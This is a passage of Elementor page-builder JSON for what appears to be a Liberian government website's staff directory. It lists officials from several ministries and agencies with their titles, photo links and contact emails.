be.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a 